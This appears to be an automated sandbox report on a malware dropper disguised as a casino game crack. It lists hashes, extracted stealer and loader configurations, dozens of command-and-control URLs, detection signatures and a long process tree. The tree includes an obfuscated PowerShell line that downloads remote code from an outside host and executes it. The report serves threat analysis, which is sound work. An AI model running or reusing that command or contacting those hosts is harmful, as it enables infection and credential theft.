Analysis
-
max time kernel
95s -
max time network
306s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 07:46
Static task
static1
Behavioral task
behavioral1
Sample
Cd.Completo.Gioco.Online.Casin.crack.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Cd.Completo.Gioco.Online.Casin.crack.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Cd.Completo.Gioco.Online.Casin.crack.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Cd.Completo.Gioco.Online.Casin.crack.exe
Resource
win10v20201028
General
-
Target
Cd.Completo.Gioco.Online.Casin.crack.exe
-
Size
5.4MB
-
MD5
baad366f257529076340afc66d1ac59c
-
SHA1
3dafcc431b85bd6a527e70879137e1f27e160849
-
SHA256
3f5a92454d1b626e24016329a9de52e40d78aae1e5977f53e820a2e2812d3975
-
SHA512
98d2e5ace89934ebc193ae6b8277b363d9d197a54bbcf6dfa3f40df2671d89c87e4d13737ea99eceb9a2a1ac3bd135ffa53d555f93f72ff2a36f1874cb94dd85
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/7116-518-0x0000000002490000-0x0000000002D9A000-memory.dmp family_glupteba behavioral2/memory/7116-519-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/7116-520-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/5444-209-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5444-210-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/5444-212-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5444-256-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 4 IoCs
pid Process 4060 keygen-pr.exe 3920 keygen-step-1.exe 1344 keygen-step-3.exe 3116 keygen-step-4.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 296 api.ipify.org 305 ipinfo.io 307 ipinfo.io 358 ip-api.com 105 api.ipify.org 177 ipinfo.io 180 ipinfo.io 219 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 7080 4500 WerFault.exe 163 5160 4500 WerFault.exe 163 6232 4500 WerFault.exe 163 -
Delays execution with timeout.exe 1 IoCs
pid Process 4432 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 2668 taskkill.exe 2096 taskkill.exe 5984 taskkill.exe 6600 taskkill.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 6056 PING.EXE 5240 PING.EXE 4348 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 178 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 185 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 306 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 309 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1496 multitimer.exe 1496 multitimer.exe 3368 chrome.exe 3368 chrome.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3368 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3760 wrote to memory of 1576 3760 Cd.Completo.Gioco.Online.Casin.crack.exe 79 PID 3760 wrote to memory of 1576 3760 Cd.Completo.Gioco.Online.Casin.crack.exe 79 PID 3760 wrote to memory of 1576 3760 Cd.Completo.Gioco.Online.Casin.crack.exe 79 PID 3368 wrote to memory of 3484 3368 chrome.exe 83 PID 3368 wrote to memory of 3484 3368 chrome.exe 83 PID 1576 wrote to memory of 4060 1576 cmd.exe 84 PID 1576 wrote to memory of 4060 1576 cmd.exe 84 PID 1576 wrote to memory of 4060 1576 cmd.exe 84 PID 1576 wrote to memory of 3920 1576 cmd.exe 85 PID 1576 wrote to memory of 3920 1576 cmd.exe 85 PID 1576 wrote to memory of 3920 1576 cmd.exe 85 PID 1576 wrote to memory of 1344 1576 cmd.exe 86 PID 1576 wrote to memory of 1344 1576 cmd.exe 86 PID 1576 wrote to memory of 1344 1576 cmd.exe 86 PID 1576 wrote to memory of 3116 1576 cmd.exe 87 PID 1576 wrote to memory of 3116 1576 cmd.exe 87 PID 1576 wrote to memory of 3116 1576 cmd.exe 87 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1000 3368 chrome.exe 88 PID 3368 wrote to memory of 1496 3368 chrome.exe 188 PID 3368 wrote to memory of 1496 3368 chrome.exe 188 PID 3368 wrote to memory of 3100 3368 chrome.exe 90 PID 3368 wrote to memory of 3100 3368 chrome.exe 90 PID 3368 wrote to memory of 3100 3368 chrome.exe 90 PID 3368 wrote to memory of 3100 3368 chrome.exe 90 PID 3368 wrote to memory of 3100 3368 chrome.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cd.Completo.Gioco.Online.Casin.crack.exe"C:\Users\Admin\AppData\Local\Temp\Cd.Completo.Gioco.Online.Casin.crack.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
PID:4060 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3920
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:1344 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵PID:800
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
PID:3116 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵PID:2276
-
C:\Users\Admin\AppData\Local\Temp\ERM7IZN5NX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ERM7IZN5NX\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵PID:4524
-
C:\Users\Admin\AppData\Local\Temp\ERM7IZN5NX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ERM7IZN5NX\multitimer.exe" 1 3.1617436173.60681e0d2882c 1016⤵PID:5652
-
C:\Users\Admin\AppData\Local\Temp\ERM7IZN5NX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ERM7IZN5NX\multitimer.exe" 2 3.1617436173.60681e0d2882c7⤵PID:5724
-
C:\Users\Admin\AppData\Local\Temp\cpwo44wswdp\cvxbprzexm1.exe"C:\Users\Admin\AppData\Local\Temp\cpwo44wswdp\cvxbprzexm1.exe" /VERYSILENT8⤵PID:3980
-
C:\Users\Admin\AppData\Local\Temp\is-8851K.tmp\cvxbprzexm1.tmp"C:\Users\Admin\AppData\Local\Temp\is-8851K.tmp\cvxbprzexm1.tmp" /SL5="$202F0,2592217,780800,C:\Users\Admin\AppData\Local\Temp\cpwo44wswdp\cvxbprzexm1.exe" /VERYSILENT9⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\is-KUCR8.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-KUCR8.tmp\winlthsth.exe"10⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\OCSkPmKU3.exe"C:\Users\Admin\AppData\Local\Temp\OCSkPmKU3.exe"11⤵PID:6396
-
C:\Users\Admin\AppData\Local\Temp\OCSkPmKU3.exe"C:\Users\Admin\AppData\Local\Temp\OCSkPmKU3.exe"12⤵PID:6236
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:5996
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:5676
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1c14ptwzgnn\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\1c14ptwzgnn\cpyrix.exe" /VERYSILENT8⤵PID:2764
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5340
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:5664
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:4896
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:5180
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:1136
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:6912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hwf1ahiea11\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\hwf1ahiea11\KiffApp1.exe"8⤵PID:2164
-
-
C:\Users\Admin\AppData\Local\Temp\5ph2ttjicqd\2ong1odek0h.exe"C:\Users\Admin\AppData\Local\Temp\5ph2ttjicqd\2ong1odek0h.exe" /ustwo INSTALL8⤵PID:2964
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "2ong1odek0h.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\5ph2ttjicqd\2ong1odek0h.exe" & exit9⤵PID:2988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "2ong1odek0h.exe" /f10⤵
- Kills process with taskkill
PID:2096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jsgtymp2np4\vict.exe"C:\Users\Admin\AppData\Local\Temp\jsgtymp2np4\vict.exe" /VERYSILENT /id=5358⤵PID:1908
-
C:\Users\Admin\AppData\Local\Temp\is-KSEIN.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-KSEIN.tmp\vict.tmp" /SL5="$8006C,870426,780800,C:\Users\Admin\AppData\Local\Temp\jsgtymp2np4\vict.exe" /VERYSILENT /id=5359⤵PID:4572
-
C:\Users\Admin\AppData\Local\Temp\is-M4VBL.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-M4VBL.tmp\win1host.exe" 53510⤵PID:5596
-
C:\Users\Admin\AppData\Local\Temp\Dw038JCIe.exe"C:\Users\Admin\AppData\Local\Temp\Dw038JCIe.exe"11⤵PID:6132
-
C:\Users\Admin\AppData\Local\Temp\Dw038JCIe.exe"C:\Users\Admin\AppData\Local\Temp\Dw038JCIe.exe"12⤵PID:6184
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\g1e3fseaens\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\g1e3fseaens\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:4204
-
C:\Users\Admin\AppData\Local\Temp\is-GN3HI.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-GN3HI.tmp\IBInstaller_97039.tmp" /SL5="$801DE,14574851,721408,C:\Users\Admin\AppData\Local\Temp\g1e3fseaens\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:2272
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-H8RES.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5216
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-H8RES.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:1900
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3t0cgtgowwj\a5xk52rpeux.exe"C:\Users\Admin\AppData\Local\Temp\3t0cgtgowwj\a5xk52rpeux.exe"8⤵PID:1436
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3t0cgtgowwj\a5xk52rpeux.exe"9⤵PID:5380
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ljp3zkzdcme\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ljp3zkzdcme\Setup3310.exe" /Verysilent /subid=5778⤵PID:2372
-
C:\Users\Admin\AppData\Local\Temp\is-4FJUS.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-4FJUS.tmp\Setup3310.tmp" /SL5="$302E2,138429,56832,C:\Users\Admin\AppData\Local\Temp\ljp3zkzdcme\Setup3310.exe" /Verysilent /subid=5779⤵PID:5680
-
C:\Users\Admin\AppData\Local\Temp\is-MEFRM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MEFRM.tmp\Setup.exe" /Verysilent10⤵PID:5304
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:4500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 95612⤵
- Program crash
PID:7080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 101612⤵
- Program crash
PID:5160
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 106412⤵
- Program crash
PID:6232
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:2472
-
C:\Users\Admin\AppData\Local\Temp\is-FSBCD.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-FSBCD.tmp\lylal220.tmp" /SL5="$30396,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:3932
-
C:\Users\Admin\AppData\Local\Temp\is-KIGE0.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-KIGE0.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:4800
-
C:\Program Files\Windows Media Player\ANXYSNONDN\irecord.exe"C:\Program Files\Windows Media Player\ANXYSNONDN\irecord.exe" /VERYSILENT14⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\is-VE7M5.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-VE7M5.tmp\irecord.tmp" /SL5="$B005C,6265333,408064,C:\Program Files\Windows Media Player\ANXYSNONDN\irecord.exe" /VERYSILENT15⤵PID:5512
-
-
-
C:\Users\Admin\AppData\Local\Temp\48-d49f4-09a-2d281-394161900254a\Lyxocaelelae.exe"C:\Users\Admin\AppData\Local\Temp\48-d49f4-09a-2d281-394161900254a\Lyxocaelelae.exe"14⤵PID:4012
-
-
C:\Users\Admin\AppData\Local\Temp\ef-32e40-dc1-f1fb2-12523f20a203a\Wugasidefo.exe"C:\Users\Admin\AppData\Local\Temp\ef-32e40-dc1-f1fb2-12523f20a203a\Wugasidefo.exe"14⤵PID:5016
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mw5tqbba.ouc\md6_6ydj.exe & exit15⤵PID:6340
-
C:\Users\Admin\AppData\Local\Temp\mw5tqbba.ouc\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\mw5tqbba.ouc\md6_6ydj.exe16⤵PID:6796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fbtdmvtv.hz3\askinstall31.exe & exit15⤵PID:6676
-
C:\Users\Admin\AppData\Local\Temp\fbtdmvtv.hz3\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\fbtdmvtv.hz3\askinstall31.exe16⤵PID:6500
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:6300
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:5984
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d3aok2cl.ehy\toolspab1.exe & exit15⤵PID:6788
-
C:\Users\Admin\AppData\Local\Temp\d3aok2cl.ehy\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\d3aok2cl.ehy\toolspab1.exe16⤵PID:6336
-
C:\Users\Admin\AppData\Local\Temp\d3aok2cl.ehy\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\d3aok2cl.ehy\toolspab1.exe17⤵PID:3588
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"11⤵PID:4104
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:5328
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:5436
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:6044
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:3564
-
C:\Users\Admin\AppData\Local\Temp\JBQ141OUJW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JBQ141OUJW\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵
- Suspicious behavior: EnumeratesProcesses
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\JBQ141OUJW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JBQ141OUJW\multitimer.exe" 1 3.1617436245.60681e5557b4c 10313⤵PID:4444
-
C:\Users\Admin\AppData\Local\Temp\JBQ141OUJW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JBQ141OUJW\multitimer.exe" 2 3.1617436245.60681e5557b4c14⤵PID:4376
-
C:\Users\Admin\AppData\Local\Temp\otqpmh4jg1n\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\otqpmh4jg1n\cpyrix.exe" /VERYSILENT15⤵PID:6952
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:2236
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"17⤵PID:6356
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub17⤵PID:6432
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe18⤵PID:6380
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:6548
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:3168
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:7128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kzdzt5y2kwf\vict.exe"C:\Users\Admin\AppData\Local\Temp\kzdzt5y2kwf\vict.exe" /VERYSILENT /id=53515⤵PID:6944
-
C:\Users\Admin\AppData\Local\Temp\is-E5QMK.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-E5QMK.tmp\vict.tmp" /SL5="$10454,870426,780800,C:\Users\Admin\AppData\Local\Temp\kzdzt5y2kwf\vict.exe" /VERYSILENT /id=53516⤵PID:7140
-
C:\Users\Admin\AppData\Local\Temp\is-JPUQO.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-JPUQO.tmp\win1host.exe" 53517⤵PID:6908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gqukgrvob2e\enclz3r3caf.exe"C:\Users\Admin\AppData\Local\Temp\gqukgrvob2e\enclz3r3caf.exe" /ustwo INSTALL15⤵PID:6992
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "enclz3r3caf.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\gqukgrvob2e\enclz3r3caf.exe" & exit16⤵PID:6728
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "enclz3r3caf.exe" /f17⤵
- Kills process with taskkill
PID:6600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rspwt5daze5\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\rspwt5daze5\Setup3310.exe" /Verysilent /subid=57715⤵PID:7052
-
C:\Users\Admin\AppData\Local\Temp\is-P1KH0.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-P1KH0.tmp\Setup3310.tmp" /SL5="$10456,138429,56832,C:\Users\Admin\AppData\Local\Temp\rspwt5daze5\Setup3310.exe" /Verysilent /subid=57716⤵PID:6168
-
C:\Users\Admin\AppData\Local\Temp\is-IPENK.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IPENK.tmp\Setup.exe" /Verysilent17⤵PID:6036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uodyyij4f4e\app.exe"C:\Users\Admin\AppData\Local\Temp\uodyyij4f4e\app.exe" /8-2315⤵PID:7116
-
-
C:\Users\Admin\AppData\Local\Temp\luzxcuzadi0\vpn.exe"C:\Users\Admin\AppData\Local\Temp\luzxcuzadi0\vpn.exe" /silent /subid=48215⤵PID:6280
-
C:\Users\Admin\AppData\Local\Temp\is-P0Q7A.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-P0Q7A.tmp\vpn.tmp" /SL5="$10532,15170975,270336,C:\Users\Admin\AppData\Local\Temp\luzxcuzadi0\vpn.exe" /silent /subid=48216⤵PID:6688
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E1CUO5Q3JQ\setups.exe"C:\Users\Admin\AppData\Local\Temp\E1CUO5Q3JQ\setups.exe" ll12⤵PID:2464
-
C:\Users\Admin\AppData\Local\Temp\is-399CJ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-399CJ.tmp\setups.tmp" /SL5="$6019E,635399,250368,C:\Users\Admin\AppData\Local\Temp\E1CUO5Q3JQ\setups.exe" ll13⤵PID:2168
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:4628
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:2776
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:6004
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:5608
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:3976
-
